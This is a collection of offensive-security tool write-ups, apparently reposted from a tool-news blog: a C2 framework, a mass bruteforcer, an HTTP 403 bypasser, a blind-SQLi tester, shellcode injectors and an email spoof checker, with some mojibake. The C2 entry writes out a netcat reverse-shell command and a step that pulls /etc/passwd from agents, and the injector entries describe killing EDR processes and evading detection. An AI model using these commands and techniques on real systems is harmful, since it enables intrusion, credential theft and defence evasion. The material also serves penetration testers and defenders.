Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ q
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ r
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ s
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ symbols
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR Evasion Lab for training & learning purposes. (️ under construction..)​

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),

Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


MacMaster - MAC Address Changer

By: Zion3R


MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

Features

  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.

Installation

MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone https://github.com/HalilDeniz/MacMaster.git
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python setup.py install

Usage

$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value

Arguments

  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
  1. Set a specific MAC address:
    $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ macmaster.py -i eth0 -r
  3. Reset MAC address to its original value:
    $ macmaster.py -i eth0 -rs
  4. Set a custom OUI:
    $ macmaster.py -i eth0 -co 08:00:27
  5. Show program version:
    $ macmaster.py -V

Replace eth0 with your desired network interface.

Note

You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

Contributing

Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:

Contact



NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.


The summary of the changelog since the 2023.3 release from August is:

Mass-Bruter - Mass Bruteforce Network Protocols

By: Zion3R


Mass bruteforce network protocols

Info

Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.


How it works

  1. Use masscan(faster than nmap) to find alive hosts with common ports from network segment.
  2. Parse ips and ports from masscan result.
  3. Craft and run hydra commands to automatically bruteforce supported network services on devices.

Requirements

  • Kali linux or any preferred linux distribution
  • Python 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter

# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

Ex: masscan_192.168.0.0-16.txt

Example command:

masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

Example Resume Command:

masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">
β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]

Mass Bruteforce Script

Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.

Quick Bruteforce Example:

python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Fetch cracked credentials:

python3 mass_bruteforce.py -s

Todo

  • Migrate with dpl4hydra
  • Optimize the code and functions
  • MultiProcessing

Any contributions are welcomed!



Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R


Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 forbidden_buster.py -u http://example.com

Forbidden Buster accepts the following arguments:

fuzzing (stressful) --include-user-agent Include User-Agent fuzzing (stressful)" dir="auto">
  -h, --help            show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)

Example Usage:

python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β 


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command

Notes

  • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or even some more custom header in that file itself according to your need.

Demo



RecycledInjector - Native Syscalls Shellcode Injector

By: Zion3R


(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).


Usage

.\RecycledInjector.exe <path_to_shellcode_file>

Proof of Concept

This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

Β 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R


ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with shellcode payload, is performing the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.

When using a PE payload, ModuleShifting will perform the following operation:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)

  1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
